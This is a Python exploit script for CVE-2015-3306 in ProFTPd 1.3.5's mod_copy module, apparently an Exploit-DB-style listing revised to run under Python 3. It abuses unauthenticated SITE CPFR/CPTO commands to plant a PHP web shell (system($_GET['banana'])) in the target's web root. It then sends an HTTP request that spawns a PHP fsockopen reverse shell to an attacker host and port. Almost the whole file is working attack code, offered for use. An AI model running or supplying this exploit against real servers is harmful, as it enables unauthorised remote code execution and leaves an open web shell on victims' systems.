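#!/usr/bin/env python
# Exploit Title: ProFTPd 1.3.5 mod_copy RCE
# Date: 2019-11-26
# Exploit Author: TheGingerNinja
# Software: ProFTPd 1.3.5 with mod_copy
# Version: 1.3.5 (the original header mixed 1.3.4 and 1.3.5; CVE-2015-3306 is
#          the mod_copy issue in the 1.3.5 release, which is also what the
#          script name and status messages below say)
# Tested on: Ubuntu 15.10
# CVE : 2015-3306
# Language : Python 2 (this revision also runs unmodified under Python 3)
#
# Non Metasploit exploit of CVE-2015-3306
# Follows pattern of: https://www.exploit-db.com/exploits/37262
#
# How it works
# ------------
# mod_copy answers SITE CPFR / SITE CPTO before the client has authenticated,
# so an anonymous TCP client can copy any file the proftpd process can read to
# any path it can write.  As in exploit-db 37262, the trick is to copy
# /proc/self/cmdline to a file whose *name* contains a PHP tag: proftpd puts
# the command it is handling into its process title, so the copied file's
# *content* then contains that PHP tag.  A second copy drops that file into
# the web root, and an HTTP request drives the resulting one-parameter web
# shell to spawn a reverse shell back to LHOST:LPORT.
#
# Usage:
#   python exploit_proftd_1_3_5.py RHOST SITEPATH LHOST LPORT
#
# RHOST:
#   IP of machine with ProFTP 1.3.5 running
#
# SITEPATH:
#   The http server home address is needed:
#   e.g. /var/www, /var/www/html
#   (the proftpd process must be able to write there, otherwise the last
#   SITE CPTO is refused and the exploit stops)
#
# LHOST:
#   Attacking machine IP with netcat listening
#   e.g 1.2.3.4
#
# LPORT:
#   Port that Netcat is listening on
#   e.g. 80
#
# Cleanup: on success the target is left with SITEPATH/pealthe.php (a web
# shell anyone can reach) and the /tmp/.<?php...> stub.  Remove both from the
# shell you obtain.

import socket
import sys

try:  # Python 3
    from urllib.parse import quote
except ImportError:  # Python 2
    from urllib import quote

import requests

# The PHP tag after "/tmp/." was lost when this listing was captured (it reads
# as an HTML tag to a scraper), which left the script copying the /tmp
# directory itself.  Reconstructed so that it reads the same GET parameter the
# HTTP step below sends ("banana"); adjust the PHP if you prefer passthru().
PHP_STUB = "<?php system($_GET['banana']); ?>"
TMP_PAYLOAD = "/tmp/." + PHP_STUB
WEB_SHELL_NAME = "pealthe.php"
FTP_PORT = 21
TIMEOUT = 10  # seconds; applies to the FTP socket and the HTTP trigger


def send_command(soc, command):
    """Send one FTP command line to ``soc``, CRLF-terminated.

    ``sendall`` is used instead of ``send`` so a short write cannot truncate
    the command in the middle of the payload path.
    """
    soc.sendall((command + "\r\n").encode("utf-8"))


def check_response(soc, check_str, exit_message):
    """Read one FTP reply from ``soc`` and abort unless it carries code ``check_str``.

    ``check_str`` is the three-digit FTP reply code the step must return (for
    example "350" after CPFR, "250" after CPTO).  The code is matched at the
    start of a reply line rather than anywhere in the buffer, so a path or
    error text that merely contains those digits cannot satisfy the check.

    On failure prints ``exit_message`` and the server's reply, closes the
    socket it was handed and exits with status 1.  Returns the decoded reply
    on success.
    """
    reply = soc.recv(1024).decode("utf-8", "replace")
    if not any(line.startswith(check_str) for line in reply.splitlines()):
        print("[-] " + exit_message)
        print("[-] Server replied: " + reply.strip())
        soc.close()
        sys.exit(1)
    return reply


def main(argv):
    """Run the exploit: plant the PHP stub over FTP, then trigger it over HTTP.

    ``argv`` is ``sys.argv``: RHOST SITEPATH LHOST LPORT (see header).  Exits
    with status 1 on bad arguments, on any unexpected FTP reply, or if the
    HTTP trigger cannot be delivered.
    """
    if len(argv) < 5:
        print("\nUsage: python %s RHOST SITEPATH LHOST LPORT\n" % argv[0])
        sys.exit(1)

    rhost, sitepath, lhost, lport = argv[1:5]
    try:
        int(lport)
    except ValueError:
        # lport is spliced into PHP source below; a non-numeric value would
        # only fail, silently, on the target.
        print("[-] LPORT must be a TCP port number, got %r" % lport)
        sys.exit(1)

    print("[+] REMINDER: Start a Netcat listener on port: " + lport)
    print("[+] Running exploit for ProFTPd 1.3.5...")

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(TIMEOUT)  # a filtered port or silent server must not hang the run
    try:
        s.connect((rhost, FTP_PORT))
        banner = s.recv(1024).decode("utf-8", "replace")
        print("[+] FTP Banner: " + banner.strip())

        print("[+] Sending exploit...")
        # No USER/PASS is sent on purpose: the vulnerability is that mod_copy
        # serves these SITE commands to an unauthenticated session.
        send_command(s, "SITE CPFR /proc/self/cmdline")
        check_response(s, "350", "Copy from /proc/self/cmdline failed!")
        send_command(s, "SITE CPTO " + TMP_PAYLOAD)
        check_response(s, "250", "Failed copy to temporary payload!")
        send_command(s, "SITE CPFR " + TMP_PAYLOAD)
        check_response(s, "350", "Failed copying from temporary payload!")
        send_command(s, "SITE CPTO " + sitepath + "/" + WEB_SHELL_NAME)
        check_response(s, "250", "Failed to copy PHP payload to website home path!")
    finally:
        s.close()

    # nohup + trailing '&' detach the PHP reverse shell so the web request
    # returns instead of blocking until the shell exits.
    payload = ("nohup php -r '$sock=fsockopen(\"" + lhost + "\"," + lport + ");"
               "exec(\"/bin/sh -i <&3 >&3 2>&3\");' & ")
    url = "http://" + rhost + "/" + WEB_SHELL_NAME + "?banana=" + quote(payload)
    print("[+] Running payload by requesting: " + url)
    try:
        requests.get(url, timeout=TIMEOUT)
    except requests.RequestException as exc:
        print("[-] HTTP request failed: %s" % exc)
        sys.exit(1)
    print("[+] Thank you for using this exploit. Now go bananas!")


if __name__ == "__main__":
    main(sys.argv)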